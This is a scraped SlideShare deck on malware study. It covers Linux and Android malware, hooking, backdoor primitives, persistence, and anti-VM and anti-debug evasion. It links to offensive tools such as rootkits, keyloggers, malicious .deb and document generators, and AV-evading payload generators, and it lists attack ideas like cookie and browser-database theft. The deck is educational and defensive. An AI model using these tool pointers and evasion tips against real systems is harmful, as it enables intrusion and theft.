Download to read offline
![Doubts ?
Contact:
coolerlair [at] gmail [dot] com](https://image.slidesharecdn.com/malwaresstudy-210320224941/75/Understand-study-49-2048.jpg)
![Doubts ?
Contact:
coolerlair [at] gmail [dot] com](https://crownmelresort.com/image.slidesharecdn.com/malwaresstudy-210320224941/75/Understand-study-49-2048.jpg)
Uploaded byAntonio Costa aka Cooler_
Understand study
The document provides an overview of various types of malware, including those targeting Windows, Linux, and mobile platforms, discussing their functionalities, methods of attack, and the importance of security measures. It emphasizes that even with efforts from major companies like Google and Apple, vulnerabilities persist, and malware can exploit these weaknesses to take control of devices. Additionally, it includes links to resources for malware analysis and tools for both studying and mitigating malicious activities.
More Related Content
![[HUN][hackersuli] Malware avengers](https://cdn.slidesharecdn.com/ss_thumbnails/malwareavengers-191217064502-thumbnail.jpg?width=640&height=640&fit=bounds)
Understand study
- 1.
- 2. whoamy Just another Programmer fouryears experience Security Engineer Ten years experience Antonio Costa – github.com/CoolerVoid Twitter: @Cooler_freenode
- 3.
- 4. Malwares Malware is thename for a program designed to mistreat its users. Viruses typically are malicious, but sometimes software products and software preinstalled in products can also be malicious — and often are, im not even joking, it’s a sad fact. You can see that these softwares sometimes stand in the whitelist of signatures of some antivirus. Malware often contains hidden behavior which is only activated when properly triggered.
- 5. Last microsoft report2020 https://www.microsoft.com/en-us/wdsi/threats
- 6. Malware for Linux? Fake pkg resources like fake deb, fake rpm, fake ko(kernel module)… Fake sudo Fake auth with QT/GTK/X11… keyloggers with X11 etc... Its not impossible ! github.com/GiacomoLaw/Keylogger - keylogger github.com/CoolerVoid/rootstealer - tool to manipulate X11 github.com/m0nad/Diamorphine - Rootkit for modern kernels github.com/mthbernardes/Derbie - Tool to generate malicious .deb pkgs
- 7. Malware for mobile? Google and Apple invest a lot in security research, but that's not enough! As we have shown time after time, malware is still able to bypass market security ! (google play, appstore) Every day security vulnerabilities are discovered in a constant basis, and if your device is not patched, you are vulnerable!
- 8. Android Malware uses Android’sAccessibility Service to take over the phone, displaying a request prompt that would allow it to add itself to the device administrator list and become the default message manager. Once the takeover is complete, malware can send an SMS/whats app msg containing a specific text to any number, extract text messages and send them to the cracker, open links, change the address of the company center, steal data like phone call info. Other view, once the takeover is complete, malware can send msg to spread him self for your contacts… each malware have a different context!
- 9.
- 10.
- 11.
- 12. The X-files This ismy compendium of strange underground codes to make a schoolar joke, forbidden recipes, fallen functions from the depths... only to Windows platforms. Keep out of malicious feelings, Only to study security purposes! https://github.com/CoolerVoid/X_files/
- 13. Malware in Java... Everythinguses libC, for example CoreUtils used by unix like systems like FreeBSD, Linux, Darwin(MacOS)... you can see commands like rm,ls,mv,mkdir... this programs uses libc, labels for syscalls in unistd.h etc...
- 14.
- 15.
- 16. Persistence Unix systems youcan use rc.local, init… have other paths…
- 17. Hooking Operating systems andsoftware may provide the means to easily insert event hooks at runtime. It is available provided that the process inserting the hook is granted enough permission to do so. Microsoft Windows for example, allows you to insert hooks that can be used to process or modify system events and application events for dialogs, scrollbars, and menus as well as other items. It also allows a hook to insert, remove, process or modify keyboard and mouse events. Linux provides another example where hooks can be used in a similar manner to process network events within the kernel through NetFilter( github.com/CoolerVoid/HiddenWall ).
- 18.
- 19. Trial bypass history Hooktime functions… GetSystemTime() GetTimeFormat() SystemTimeToFileTime()… If have NTP external check, make Pharming in hosts... docs.microsoft.com/en-us/windows/win32/sysinfo/time-functions
- 20.
- 21.
- 22.
- 23.
- 24. Backdoor resources Socket(), listen(),bind()… libcurl… libnet… raw socket port knocking
- 25. Backdoor resources Send(), recv(),sendfile() etc...
- 26. Backdoor resources popen(), system(),execv()...
- 27. Port knocking Raw socketshell with AES256-GCM using Port Knocking technique github.com/CoolerVoid/ninja_shell Raw mode is basically there to allow you to bypass some of the way that your computer handles TCP/IP.
- 28.
- 29.
- 30. Danger docs... Macros, VBA,Exploits... Turn a normal PDF file into malicious. github.com/3gstudent/Worse-PDF Turn Doc files in malicious. https://github.com/sevagas/macro_pack
- 31. Other resources Replace QR-code Changerender of bar code Steal Cookies form grabbing Steal DB of browser (Sqlite) Using browser to bypass firewall (headless) Uses bitlocker to encrypt data… (ransomware) Uses embedded lib to encrypt resources… Miner bot... Up fake driver (rootkit)...
- 32.
- 33. Protections To prolong thelife of a malware, you can frequently see anti-VM and anti-debugging techniques being used to delay the analysis process performed by security experts. The good news for you is that you have a lot of ways to try and mitigate that, for example with ollydbg you can use OllyExt plugin to try bypassing anti- debugger resources, another way you can detect some behaviors while also following the hooking approach is, for example, when the debugger executes a malware, you can force by hooking the function IsDebuggerPresent() to make it always return zero( bypassing the debug detector).
- 34. Bypass malware protections Butin any case, you can also protect the machine. You can use the function IsDebuggerPresent() and, with hooking, force it to always return value 1. By following this approach the malware is never going to start the trigger since he’s either frozen or called an exit() function by now, some other contexts may happen as well. Malware often contains hidden behavior which is only activated when properly triggered. No trigger, the malware quits, simple.
- 35.
- 36. Do you knowyour enemy ?
- 37. Do you knowyour enemy ?
- 38. Install vmware additions orvirtualbox resourses to mimic a VM in your desktop… Manual unpack and Migrate DLLs, binarys etc
- 39. Trigger Anti-VM resources Inspiredfrom the PowerShell script Fake Sandbox Processes (FSP), this script allows you to create various artifacts on a bare-metal Windows computer in an attempt to trick malwares that looks for VM or analysis tools. github.com/NavyTitanium/Fake-Sandbox-Artifacts
- 41.
- 42. Problems in sandboxartifacts Bank desktop applications uses anti debugger and AntiVM resources… this can close your bank desktop application… Games(steam client/ origens client) have anti-cheat engines, that engines close application when detect VM resources or Debugger resources...
- 43.
- 44. theZoo “theZoo is aproject created to make the possibility of malware analysis open and available to the public. Since we have found out that almost all versions of malware are very hard to come by in a way which will allow analysis, we have decided to gather all of them for you in an accessible and safe way. theZoo was born by Yuval tisf Nativ and is now maintained by Shahak Shalev.”. https://github.com/ytisf/theZoo
- 45. Veil “Veil is atool designed to generate metasploit payloads that bypass common anti-virus solutions”. github.com/Veil-Framework/Veil
- 46. al-khaser “Public malware techniquesused in the wild: Virtual Machine, Emulation, Debuggers, Sandbox detection. ”. https://github.com/LordNoteworthy/al-khaser
- 47.
- 48.
- 49. Doubts ? Contact: coolerlair [at]gmail [dot] com
- 50.